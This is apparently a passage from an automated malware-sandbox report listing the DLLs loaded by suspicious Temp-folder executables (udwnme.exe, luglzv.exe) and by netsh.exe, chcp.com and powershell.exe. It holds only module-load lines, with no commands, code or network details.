                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
